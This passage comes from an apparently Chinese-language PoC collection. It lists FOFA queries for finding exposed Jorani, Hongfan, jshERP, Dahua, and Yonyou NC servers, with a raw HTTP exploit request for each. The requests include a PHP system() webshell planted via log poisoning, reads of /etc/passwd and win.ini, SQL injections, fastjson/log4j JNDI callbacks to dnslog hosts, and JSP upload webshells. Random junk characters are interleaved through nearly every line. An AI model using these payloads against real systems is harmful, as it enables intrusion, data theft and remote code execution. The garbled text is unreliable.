Cache-Control: no-cache
$ U. k8 l0 R. \) k1 _ jUpgrade-Insecure-Requests: 14 @3 A" ^+ y0 V" y$ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) Q' w4 J$ Z* D. CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, F1 L. u4 B# o5 D* DAccept-Encoding: gzip, deflate% t- f0 \: O9 a; r
Accept-Language: zh-CN,zh;q=0.9,en;q=0.86 ~; Z6 n w7 Y! z. A
Connection: close2 h: _, Z+ l$ M Y1 F& j
1 ^) q4 L4 A+ P: Y6 b' ~8 Y
5 ?4 x3 }9 W6 \$ K
12. Jorani < 1.0.2 远程命令执行1 h8 y u9 j' v1 L! m
FOFA:title="Jorani"
, d1 L' G2 c3 L- ~( ?- i, {第一步先拿到cookie1 t" [! P0 ]+ ^: S6 D
GET /session/login HTTP/1.1( ?( f. O& \! Q1 k* }
Host: 192.168.190.308 I7 ~! o6 S: v
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
5 S1 l/ `9 ~9 }& M& D! A& fConnection: close8 d0 S) f" r) i$ b% ]. f$ O0 @
Accept-Encoding: gzip u5 M2 C) r1 \( x! w" z
/ x2 D( ?4 u7 b7 Y' @2 F% ?4 Z# M
2 r. O! k% Q( T+ C& J* r% w! A响应中csrf_cookie_jorani用于后续请求
: i# u+ {: B. t+ [+ F6 R; Q+ d7 q0 YHTTP/1.1 200 OK
7 @7 B/ M O2 R3 T0 iConnection: close
- c- m3 |. P$ g! z4 n0 W6 n& }Cache-Control: no-store, no-cache, must-revalidate
8 m! ^$ ^4 h" j: U |+ X6 C8 } UContent-Type: text/html; charset=UTF-8
" ?0 W+ H- z& t2 gDate: Tue, 24 Oct 2023 09:34:28 GMT
4 o% b" e3 h# A9 ~ m9 _Expires: Thu, 19 Nov 1981 08:52:00 GMT
; \7 s# b" p, P9 \Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
, v3 j( C9 U* L7 V+ e4 ~, G. g; Z. GPragma: no-cache7 ~% }% r6 e N0 n. S
Server: Apache/2.4.54 (Debian)0 k, b+ C! d5 z
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/4 o/ `& m" H8 M v9 X) w8 M
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
; W* i0 d" e/ J# nVary: Accept-Encoding& \! _3 e- Z1 O: \
' n& j, H' x) F7 {# X
6 i; f4 V& z; s4 q- Q" \3 oPOST请求,执行函数并进行base64编码
) N* }7 H6 C$ @" N$ K, B6 lPOST /session/login HTTP/1.16 N; u6 D1 d0 m( c# @2 {: m5 O
Host: 192.168.190.30 @- Z! Y/ V/ K' N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
1 f1 M# a& k" z+ b q* Y \" z. s( pConnection: close+ e% d: ^8 z% w0 y' U
Content-Length: 252
) }" g$ \% G3 p) _2 i, Z, nContent-Type: application/x-www-form-urlencoded! H5 G8 z; c- G+ O5 |, f& X8 Y
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; i- ?5 j2 I$ p2 h/ m' U: Q% s; @
Accept-Encoding: gzip/ u6 }4 U$ Q& u8 H! u
4 [" F5 K6 D7 s5 Y p1 r
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor/ W0 A: R' l/ X$ c6 g0 @8 {% T
+ t" G: C- n2 r7 k0 J/ m; a
2 b* p* W$ O/ l9 W
% S$ c- P' k# R2 l' K0 k' U6 l/ m
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
# d( g+ z% N7 r7 p2 E" \" Z8 U6 z3 fGET /pages/view/log-2023-10-24 HTTP/1.1! Q3 [' k9 E* v# o( `" N1 f
Host: 192.168.190.30
- R1 T6 {2 R4 B6 S* o' J: k7 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
. Q3 S7 [) \4 c- F% T& JConnection: close
' r# f6 ^( H0 tCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
6 ]* M( ]4 a8 t+ `& ? zK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
2 s1 }6 l+ e* M* w* U7 d; nX-REQUESTED-WITH: XMLHttpRequest
- v% }; z6 o/ Q! j V/ l: eAccept-Encoding: gzip
1 H; G$ {- y7 h! s2 ^; m
8 x8 f/ Q2 d7 X, s
) |9 h, ]+ d# a/ l/ [13. 红帆iOffice ioFileDown任意文件读取; k; [/ Q6 ^5 x. R
FOFA:app="红帆-ioffice"- N% `8 ?$ D: u; L3 I* u m
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1) W& u% Y3 Y @" L {6 g1 [
Host: x.x.x.x0 g& D& J! w1 E& T$ o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" C+ }$ W0 U. b3 W, G N, v! o
Connection: close2 `; E. z3 x( I7 T X
Accept: */*- q0 @3 L; g% k8 k7 ^; O7 k
Accept-Encoding: gzip
4 s% S) H& e# q D. A; ?# w. d5 A' ~. T. k
4 U$ \6 Z# J& p4 c1 u14. 华夏ERP(jshERP)敏感信息泄露& \% s" E, ]; C; p) T4 r( I* L! P
FOFA:body="jshERP-boot"
# n) N3 F$ S/ I/ z# L泄露内容包括用户名密码
, l& w, m" p- W$ f& Y4 QGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
2 Z! h. d" W# t% vHost: x.x.x.x5 r' Q; t, F) J: h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Z, k3 G" t$ `, f- F$ `$ z' \2 N" g' d% ]Connection: close7 _! O- j5 M1 w: }" y3 t! j* E
Accept: */*1 b. b& q/ S9 ~3 ]
Accept-Language: en
6 k) A$ E8 H- i* vAccept-Encoding: gzip
8 @+ U1 j9 s1 j. j& Q* K$ |0 ^% ?2 T8 S* C$ y' a
% H; y- h; A8 B8 [ n
15. 华夏ERP getAllList信息泄露
, L4 l0 K9 g" Q0 tCVE-2024-0490( q4 p$ C( c8 O n
FOFA:body="jshERP-boot"% Y! |& a$ t6 g4 Z% Q
泄露内容包括用户名密码/ l) ^" U2 c% ~
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
- K1 o" s" E1 ~) T% R, n5 l M5 OHost: 192.168.40.130:1002 m1 r1 M" T4 n$ _& G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36% k# b+ [, F5 z+ n
Connection: close
1 Z3 E0 g5 |. j+ a! O2 WAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
, P+ Z8 H, `7 v# t' OAccept-Language: en7 N2 B- j1 N0 ]! C! S5 P
sec-ch-ua-platform: Windows
& q0 N$ S4 E+ w& P+ ^+ tAccept-Encoding: gzip
9 X& u2 a' X7 n" K
5 x$ N) ]9 U; K7 _ Z9 ~9 c2 d/ a# C) w
16. 红帆HFOffice医微云SQL注入
6 h# p5 k. d7 f/ W! A5 \FOFA:title="HFOffice" i5 ]2 T- I4 g
poc中调用函数计算1234的md5值* j) f: \0 b1 b% [7 O: O, R
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1) M) K, K8 {; ^/ H& ]4 f/ ?
Host: x.x.x.x
d9 Y5 [& ~- N1 TUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36; J2 y/ v( s+ Q' ?' a& g
Connection: close
. _; y h" W- \$ uAccept: */*% I' C d' y2 F ~* b' o; _5 A
Accept-Language: en
6 O H4 k: }" u W' o% [Accept-Encoding: gzip
9 i4 L+ h4 \5 F% n1 d: j* b. W. r" l! }! e
' y4 D- |6 a7 a! y2 Y5 R! n6 y. H7 L
17. 大华 DSS itcBulletin SQL 注入- n2 Y( H: K* V* r( L" }& R9 o
FOFA:app="dahua-DSS"
1 ^) A, X4 q! T' yPOST /portal/services/itcBulletin?wsdl HTTP/1.1. {* m$ P9 C$ b1 V, c- z4 S4 V( c
Host: x.x.x.x
1 j1 e4 D/ h+ mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) _" q9 K- S0 X" s% j# \
Connection: close
: R# M g. Q5 g1 h# H; uContent-Length: 345
- J) ~0 J9 B: @! ?. jAccept-Encoding: gzip
) f$ g- ]2 E( {* ~% X) P2 l4 C' Q$ m
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
# F0 y% }3 j/ n, X( |* \" w<s11:Body>
- u: Z y o# X <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
. t$ U, W+ ?4 e& y9 D; @! d+ U <netMarkings>
# E6 ^! G% S- _ (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
% P! g* P4 M+ K/ T8 N </netMarkings>! v% o5 L2 B1 u! ~+ {. V/ R; j5 f# h& E
</ns1:deleteBulletin> K! F% a0 s/ _ t; Y
</s11:Body>
2 T" g# `7 U) J) [</s11:Envelope>+ @: q* ^! L% `% S* h5 r
& X* B: L# \' ?4 c S; O/ g
+ s' R1 q5 ]$ h! z
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
6 t/ v: I/ P B9 S1 A3 ? tFOFA:app="dahua-DSS"4 }' q7 x, |- B. Z, ?
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
; G# C- j7 @0 lHost: your-ip; E9 u- z2 \( |: _- e' E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; y. h& w. u* v0 P+ P1 }, \Accept-Encoding: gzip, deflate, {4 J: n; F- n$ p6 ]3 r
Accept: */*
! e0 @, S& n; X" U9 DConnection: keep-alive
, N3 \; o+ [) f8 h4 y& D
2 q1 G; m. z# K! I
5 n) C, E* C& {* }# L7 r8 @% W* `! j; H+ X
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入( s1 i/ M* e( T3 F6 j
FOFA:app="dahua-DSS"
5 @: a: Z$ {, L+ A1 [ K; uGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
& r* ]8 g4 B8 XHost:
9 h# t$ e" o: y+ p, D! s$ tUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" M7 ?: O6 {5 k! k. k
Accept-Encoding: gzip, deflate: Y8 b/ |5 `+ ?/ q, x% o! v
Accept: */*& k" A v9 i5 w, y
Connection: keep-alive5 f( a; T7 F2 \- _* H- t/ B# Z
# o5 {( ~, l+ r$ v" b1 o' b
) z: L8 w/ K c; A z0 L20. 大华ICC智能物联综合管理平台任意文件读取" Z8 j8 F5 }+ n
FOFA:body="*客户端会小于800*"
$ E( P& C% d- { E0 z7 u" e; yGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
$ ^6 n7 @0 L5 A8 X7 J6 H, J }5 bHost: x.x.x.x
; [ x8 ^ V2 P1 f# D! mUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
1 @$ {% F" b- x, `( ]Connection: close/ D. X8 w4 r3 T( ^( p1 Y; d
Accept: */*( i9 E' T h( f
Accept-Language: en
2 u+ G; j( L9 UAccept-Encoding: gzip
8 ^+ a5 Y. ?9 i6 y( V: t
% J2 n) \% B$ H+ W
) |' Y5 \- F* Y21. 大华ICC智能物联综合管理平台random远程代码执行: Q# s8 x5 H+ `
FOFA:icon_hash="-1935899595"
4 u2 W9 [' ?. {3 `- EPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
. `3 b3 w: L" u u5 hHost: x.x.x.x
% {+ z' E0 e' A* d. r) w% bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; k6 W3 h3 }/ `' E" lContent-Length: 161
, O" O: a) {4 Q; i$ a* |1 fAccept-Encoding: gzip$ w: C" ?0 w' z& l
Connection: close
* V0 j) z, \- ?% N& l( LContent-Type: application/json;charset=utf-85 P) L: m% Z, a+ K8 r' q
. C1 u2 T) l) F* X3 N5 D% K- e{
1 z" J4 E# b! r3 W6 Q"a":{
; |; [+ }1 b) Y. q* `& p "@type":"com.alibaba.fastjson.JSONObject",
6 ^$ l1 ~4 V5 T" E/ S! |9 x {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}) C4 @8 e+ S1 j
}""* y/ L U% X& x& M6 u
}; e' A' p: }, ^/ ~
# B2 ?2 i1 m7 g' v5 N! _1 q
9 ~/ `4 \0 p1 v8 M+ Y# w" [" Z" @- l
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
! O' Q! n% I% S1 h7 @8 E/ qFOFA:icon_hash="-1935899595"
1 w. l2 L. P" MPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
& u" ? W( Z% n& r; h$ sHost: your-ip u) k3 b* V! p- `& ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: P- R# k$ x0 O! L _# @Content-Type: application/json;charset=utf-89 d, R0 W0 z: `- b
: c& {$ j+ z, P$ j% y{2 g+ k( u5 {4 z- k5 I) c, x
"loginName":"${jndi:ldap://dnslog}", t- u2 S3 F$ s7 D ~; t/ ^
}
/ X" {+ a" C, q* O7 v
& z$ S- \" {# U6 `" k3 B
8 F0 g9 }; O: \5 I& g
; T/ I, E+ E7 t& Z# e6 b23. 大华ICC智能物联综合管理平台 fastjson远程代码执行2 b( z* S8 ^8 P: A6 G6 D& ]
FOFA:icon_hash="-1935899595"
8 P8 c$ d* y$ P5 e1 APOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
1 R# l9 z( x1 nHost: your-ip4 ^0 W0 M4 m# n6 j. J5 p$ a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& y/ e" _3 D' b7 M# [Content-Type: application/json;charset=utf-8
# R2 M" B# t' h/ F- vAccept-Encoding: gzip
) Q4 J" R& W F+ `Connection: close% F5 v, j2 C5 C+ t; E$ k6 N; Y6 ^+ A. w2 K
2 q" C+ W# [+ q# d$ j( Q8 V6 R{
: F& w& b8 S4 L" f "a":{
4 J! Y& I2 \1 l& e; { "@type":"com.alibaba.fastjson.JSONObject",
5 k; s& q$ q; r9 _9 N! L {"@type":"java.net.URL","val":"http://DNSLOG"}
# S7 d! j7 Y4 @' S0 n0 C }""" T0 S$ G$ k7 a7 V& D* {& {7 E
}1 V, u7 a8 L2 x" G) T ^
2 ~6 g' k& k7 o1 `
2 `: N. l* P" {- ?) h, G& ?
24. 用友NC 6.5 accept.jsp任意文件上传
. u( |. M0 v y! [3 C# W! }FOFA:icon_hash="1085941792"
. k" q* t9 c8 D0 f9 f: H' W; lPOST /aim/equipmap/accept.jsp HTTP/1.1
' J7 V0 k4 e1 T( x! ]0 |Host: x.x.x.x: u: p& ], L# P& l% j+ T
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.367 g' m) }1 }2 N0 r( a p. F
Connection: close/ {9 d' |: t/ k/ b
Content-Length: 449 x2 t3 X7 ?1 E0 B$ a! c0 O
Accept: */*4 p g6 C( w5 p t& l, C/ K' j9 S/ Q
Accept-Encoding: gzip4 h+ R, J) P. h) d. R
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc; A3 g5 i3 J# f
* \8 N6 ?4 D5 e% w9 `, ^+ h6 U
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
9 ^: ], R& ]/ D' \; S! J/ BContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"7 W' s7 E2 l! h" Y" g. i
Content-Type: text/plain
, y3 J! e7 L e+ x8 x4 l
5 N' \ L9 c* H* O* S- p4 ^<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>$ R2 T' f5 I. ~1 I; k
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc, L3 S% O5 c/ S& _
Content-Disposition: form-data; name="fname"
; \: Q, @2 d0 K/ D; z, J2 m' i0 V0 f1 ~7 \8 G0 q$ Z
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp! E" ]. a" d9 i9 r' B* r1 t8 M
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
) N9 t' E# a( ?& [4 b) K- B
' }6 m; h6 }* V# p5 ?3 U6 ]* f, {5 @# k- s. n% f/ C
25. 用友NC registerServlet JNDI 远程代码执行
4 X9 {, l+ d+ B: c9 i rFOFA:app="用友-UFIDA-NC"
. W! e! j ?. s- `1 c9 V) V/ i2 bPOST /portal/registerServlet HTTP/1.1
" Q3 X% `( l/ O$ w6 ?+ w: Y0 JHost: your-ip
5 Z0 U) {* W6 h) D- i c6 T( f! RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
& @6 [2 ~$ m4 Q4 eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.92 K9 K9 G8 ~! c$ D
Accept-Encoding: gzip, deflate, Q6 }2 R# f4 v6 U% B z7 V
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6( Q# o" }% m) a7 W" L
Content-Type: application/x-www-form-urlencoded$ l1 M" K" l3 u( e; z7 R5 \' G
7 W0 B% Z/ ]/ G6 Mtype=1&dsname=ldap://dnslog% T5 Q8 _/ Q' j
: X: u6 w" O# j. ]3 f9 Z; m0 v) V, ?! v
8 `3 \4 s( H* T) D$ {- G26. 用友NC linkVoucher SQL注入
" W5 L* Z9 I& y. O- V7 rFOFA:app="用友-UFIDA-NC"- g3 ]+ O% |2 w- n3 @* Y3 E
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
4 |3 b! @! u) w) N& QHost: your-ip! }# {, w) g' o2 u% W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 y/ n/ \* I' V+ v: wContent-Type: application/x-www-form-urlencoded% [* z* A: [, T" G
Accept-Encoding: gzip, deflate' B0 D+ C! _ ]$ s$ y# \+ k+ ]1 B
Accept: */*
1 P5 E/ }( a$ {! N) mConnection: keep-alive7 X+ X) \( c) k9 d
" l7 {9 S8 O) Z; q, `1 M8 r) O
1 b+ h% n I" b9 u% M27. 用友 NC showcontent SQL注入
; U. l9 o O1 n2 N! D9 iFOFA:icon_hash="1085941792"
+ }2 Q6 n% M+ |- N% CGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
1 @( X8 K, j; d$ i/ OHost: your-ip8 u3 k, i5 n2 l( c0 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! k+ Q# [0 ~- l% ~" oAccept-Encoding: identity1 r* J' e7 @) {$ w) ~% L
Connection: close. O/ s% c- ~- h2 R
Content-Type: text/xml; charset=utf-80 U2 {0 o) t0 a0 E! [: B5 {3 ]
" F5 c o5 f: D, Q+ @0 r
$ x3 A0 W2 @3 F2 Q: G28. 用友NC grouptemplet 任意文件上传3 j0 w$ F9 Q5 N! B& V
FOFA:icon_hash="1085941792"% v W( X8 V+ e) R% a6 E5 q
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
7 ^+ R/ ?' m+ J4 p! H- z+ cHost: x.x.x.x
1 G* r# A0 t2 l) Q5 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
}5 d# g% ~ P' X- cConnection: close
6 B. M5 n% p$ P6 H9 ]Content-Length: 268
; N% A% @2 V, L8 {# }$ C& YContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk5 z# f& o0 l' K4 R0 Y) l& B
Accept-Encoding: gzip
6 X' ?% Y6 b0 B' h4 I( W7 J/ x, @; r h6 s3 x: }
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
* D: ?2 }+ z' S! Z, I# ^; W- dContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"+ x @9 S# S$ N" E6 b
Content-Type: application/octet-stream
* G6 ]5 h7 z/ G# j0 Z- Q( _( ~8 J6 _4 F ?( f: ^, b
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
5 n& M$ `8 L) m1 e' N0 |" F4 h8 q0 }------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk-- d) v& S4 B! S) }" L6 e) {
; \# {4 q2 d" u1 L, N/ E' [6 o0 P4 G% u! Z2 c2 x
/uapim/static/pages/nc/head.jsp8 f4 @- b0 i! y) J5 j. t+ t2 T
) O% u3 I1 I5 q8 \) N
29. 用友NC down/bill SQL注入
7 g0 c, t7 |7 M; f, ^" Q3 P2 }: nFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
- H- n! g% Y* x6 n8 |+ KGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
5 L' |/ \4 a4 I0 Z7 w3 f8 e7 g. aHost: your-ip# @ Y" i' P; f2 B' A+ P* w( i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ U8 l% V' @, b* ?# X) ?# M9 n, z( R
Content-Type: application/x-www-form-urlencoded
# r/ y% A( B6 t `" L0 _, kAccept-Encoding: gzip, deflate% X0 B- K/ h4 ]- D' }! l+ `
Accept: */* U- P# w" A; {- C
Connection: keep-alive
* u; Y3 C* H3 M3 V( I7 a4 e4 V5 K) h6 H' q+ y6 u
8 F7 L+ }& {# k8 V30. 用友NC importPml SQL注入- `1 @4 d H5 [" J, Y
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"9 s7 @; f3 W, o1 h$ R2 O, e
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.11 e3 a' j P& D5 }6 \& \
Host: your-ip1 y. y/ l/ s8 u$ F) `5 @6 v
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V+ y+ x% P8 {. u8 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
* g, z* e& ?7 l! S; e8 jConnection: close5 o" _8 T' p. W8 G2 J! K/ F
! N% W# g6 ]$ b d* V/ a! m* g2 X
------WebKitFormBoundaryH970hbttBhoCyj9V7 U0 {3 q6 L+ s$ l; \3 `( I
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
& g) h8 L: g' k$ i6 u/ U/ AContent-Type: image/jpeg( t/ {6 H! e7 e
------WebKitFormBoundaryH970hbttBhoCyj9V--: G6 c% I, E) V* w3 x. c# u9 v
: i/ O3 F3 h H- X: T+ v F
' E4 `0 |3 `! P0 _2 \/ m
31. 用友NC runStateServlet SQL注入
* O" x w C; g- n: l( Jversion<=6.5$ f |3 H1 t% x2 e5 R! q
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
. p8 ?- c% o& ^/ F0 Z) R$ v! J- \GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
! g/ Z, W: H6 L3 R, G7 G! kHost: host7 B: u- v) ^$ G9 Z: F0 P/ Z# J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
# I4 x% T1 _" x$ e2 w( Y. B' IContent-Type: application/x-www-form-urlencoded& n( @ _2 t* @. }
7 K: k* M$ Y9 c
1 v- r+ ]( r7 _! {32. 用友NC complainbilldetail SQL注入& ~) p0 c7 w' U
version= NC633、NC65& G! r3 }' w1 x3 q" ~7 U
FOFA:app="用友-UFIDA-NC") A0 ^' P R/ K: q
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.17 t' y3 O6 v' C: X8 b' |. z' U# n; h
Host: your-ip
& N* a% {: b& a& H V7 U- z% O( AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) L- e5 R+ B6 \" T$ d yContent-Type: application/x-www-form-urlencoded7 T7 ^! g9 f3 M/ w" X9 j" P/ a* n0 Z; Z9 B
Accept-Encoding: gzip, deflate R3 a1 t9 H$ I; O
Accept: */*# ?$ y8 Z8 A5 o* o
Connection: keep-alive" E3 h! q# z2 D1 L$ j7 U) F4 J
2 O( ` y+ F2 p" p5 s0 U# t$ ~5 i" S! _! F- P
33. 用友NC downTax/download SQL注入3 S; d- J, i- \
version:NC6.5FOFA:app="用友-UFIDA-NC"
3 R: ]7 t: \; [& Q0 CGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
0 Y9 L$ e) z% o4 z8 e, DHost: your-ip9 g- J& O3 E z, k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 m E8 U7 Y# S. H7 u$ _2 [Content-Type: application/x-www-form-urlencoded8 C" n% A+ y5 \8 q" ~9 z
Accept-Encoding: gzip, deflate+ R7 ]$ F1 C/ B5 M0 t
Accept: */*& H! d ?) K2 C/ o' {# \
Connection: keep-alive7 l9 C9 [5 [1 @ C
$ I$ I/ R, ?# b1 [5 Z8 Y0 y3 J8 G1 s4 R
34. 用友NC warningDetailInfo接口SQL注入& b" F: s$ g9 ^- J/ t+ V
FOFA:app="用友-UFIDA-NC"' S$ \ h8 e9 S% [3 u" I' x
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
6 R% A5 o% N& ]% ]Host: your-ip% [) ~' k7 l6 D; Q9 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! E+ i. u5 X. t$ U
Content-Type: application/x-www-form-urlencoded
- \0 W- ?* U: ^" q- YAccept-Encoding: gzip, deflate- S4 f F3 v4 P. U
Accept: */*
9 c- V! }2 B# l+ Z3 xConnection: keep-alive
9 f4 F% t3 Q- `5 T# K6 h; [: D" l6 n$ ?' |# \
) q, {4 n) o5 I7 a" T
35. 用友NC-Cloud importhttpscer任意文件上传
0 O3 v K: n6 ~# B7 T* nFOFA:app="用友-NC-Cloud"
# ?3 u% T) _8 ePOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.14 W+ N6 @# S9 c' {' J+ G& W$ f# A
Host: 203.25.218.166:8888
